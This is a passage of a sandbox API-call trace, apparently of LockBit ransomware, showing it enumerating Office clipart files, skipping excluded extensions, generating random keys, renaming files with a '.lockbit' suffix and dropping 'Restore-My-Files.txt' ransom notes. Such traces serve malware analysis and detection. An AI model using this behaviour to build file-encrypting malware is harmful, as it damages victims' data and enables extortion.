lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0170.964] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0170.964] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0170.964] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0170.964] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02749U.BMP") returned 1 [0170.964] lstrcmpiW (lpString1="ntldr", lpString2="PH02749U.BMP") returned -1 [0170.964] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02749U.BMP") returned -1 [0170.964] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02749U.BMP") returned -1 [0170.964] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02749U.BMP") returned -1 [0170.964] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02749U.BMP") returned 1 [0170.964] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02749U.BMP") returned -1 [0170.964] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0170.964] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02749U.BMP") returned=".BMP" [0170.964] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0170.964] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0170.964] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0170.964] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0170.964] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0170.964] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0170.964] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0170.964] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0170.964] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0170.964] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0170.964] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0170.964] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0170.964] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0170.965] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0170.965] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0170.965] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0170.965] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0170.965] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0170.965] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0170.965] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0170.965] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0170.965] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0170.965] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0170.965] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0170.965] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0170.965] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0170.965] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0170.965] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0170.965] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02749U.BMP.lockbit") returned 72 [0170.965] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02749U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02749u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0170.968] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0170.968] malloc (_Size=0x40068) returned 0x3e70008 [0170.968] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=33048) returned 1 [0170.969] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0170.969] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0170.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0170.969] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0170.969] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0170.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0170.969] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0170.971] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02749U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02749U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0170.971] malloc (_Size=0xa6) returned 0x1fa2ed8 [0170.971] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0170.972] free (_Block=0x1fa2ed8) [0170.972] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02749U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0170.972] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0170.972] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0170.972] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd045f000, ftCreationTime.dwHighDateTime=0x1bd4e4b, ftLastAccessTime.dwLowDateTime=0x5a425410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd045f000, ftLastWriteTime.dwHighDateTime=0x1bd4e4b, nFileSizeHigh=0x0, nFileSizeLow=0x64c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02750G.GIF", cAlternateFileName="")) returned 1 [0170.972] lstrcmpiW (lpString1=".", lpString2="PH02750G.GIF") returned -1 [0170.972] lstrcmpiW (lpString1="..", lpString2="PH02750G.GIF") returned -1 [0170.972] PathFindExtensionW (pszPath="PH02750G.GIF") returned=".GIF" [0170.972] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0170.973] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0170.973] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0170.973] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0170.973] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0170.973] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0170.973] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0170.973] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0170.973] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0170.973] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0170.973] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0170.973] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0170.973] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0170.973] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0170.973] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0170.973] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0170.973] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0170.973] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0170.973] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0170.973] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0170.973] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0170.973] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0170.973] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0170.973] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0170.973] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0170.973] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0170.974] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0170.974] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0170.974] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0170.974] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0170.974] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0170.974] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0170.974] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0170.974] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0170.974] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0170.974] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0170.974] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0170.974] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0170.974] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0170.974] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0170.974] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0170.974] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0170.974] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0170.974] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0170.974] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0170.974] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0170.974] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0170.974] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02750G.GIF") returned 1 [0170.974] lstrcmpiW (lpString1="ntldr", lpString2="PH02750G.GIF") returned -1 [0170.974] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02750G.GIF") returned -1 [0170.974] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02750G.GIF") returned -1 [0170.974] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02750G.GIF") returned -1 [0170.974] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02750G.GIF") returned 1 [0170.975] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02750G.GIF") returned -1 [0170.975] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0170.975] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02750G.GIF") returned=".GIF" [0170.975] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0170.975] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0170.975] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0170.975] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0170.975] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0170.975] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0170.975] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0170.975] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0170.975] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0170.975] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0170.975] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0170.975] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0170.975] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0170.975] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0170.975] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0170.975] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0170.975] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0170.975] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0170.975] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0170.975] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0170.975] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0170.975] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0170.975] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0170.975] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0170.976] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0170.976] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0170.976] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0170.976] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0170.976] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02750G.GIF.lockbit") returned 72 [0170.976] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02750G.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02750g.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0170.976] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0170.976] malloc (_Size=0x40068) returned 0x3ef0008 [0170.976] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=25799) returned 1 [0170.976] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0170.977] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0170.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0170.977] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0170.977] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0170.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0170.977] ReadFile (in: hFile=0x2a4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0170.981] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02750G.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02750G.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0170.981] malloc (_Size=0xa6) returned 0x1fa2ed8 [0170.981] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0170.982] free (_Block=0x1fa2ed8) [0170.982] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02750G.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0170.982] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0170.982] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0170.982] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x105ca100, ftCreationTime.dwHighDateTime=0x1bd4e53, ftLastAccessTime.dwLowDateTime=0x5a425410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x105ca100, ftLastWriteTime.dwHighDateTime=0x1bd4e53, nFileSizeHigh=0x0, nFileSizeLow=0x16f40, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02750U.BMP", cAlternateFileName="")) returned 1 [0170.982] lstrcmpiW (lpString1=".", lpString2="PH02750U.BMP") returned -1 [0170.982] lstrcmpiW (lpString1="..", lpString2="PH02750U.BMP") returned -1 [0170.982] PathFindExtensionW (pszPath="PH02750U.BMP") returned=".BMP" [0170.982] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0170.982] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0170.982] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0170.982] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0170.982] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0170.982] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0170.982] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0170.982] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0170.982] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0170.983] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0170.983] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0170.983] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02750U.BMP") returned 1 [0170.984] lstrcmpiW (lpString1="ntldr", lpString2="PH02750U.BMP") returned -1 [0170.984] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02750U.BMP") returned -1 [0170.984] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02750U.BMP") returned -1 [0170.984] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02750U.BMP") returned -1 [0170.984] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02750U.BMP") returned 1 [0170.984] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02750U.BMP") returned -1 [0170.984] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0170.984] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02750U.BMP") returned=".BMP" [0170.984] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0170.984] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0170.984] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0170.985] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0170.985] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0170.985] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0170.985] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0170.985] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02750U.BMP.lockbit") returned 72 [0170.985] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02750U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02750u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0170.985] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0170.985] malloc (_Size=0x40068) returned 0x3fb00b8 [0170.986] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3fb00d0 | out: lpFileSize=0x3fb00d0*=94016) returned 1 [0170.986] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0170.987] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0170.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ff00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ff00ec) returned 0x0 [0170.987] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0170.987] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0170.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ff00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ff00fc) returned 0x0 [0170.987] ReadFile (in: hFile=0xec, lpBuffer=0x3fb00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8) returned 1 [0171.797] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02750U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02750U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.797] malloc (_Size=0xa6) returned 0x1fa2ed8 [0171.797] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0171.799] free (_Block=0x1fa2ed8) [0171.799] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02750U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0171.799] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0171.799] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, 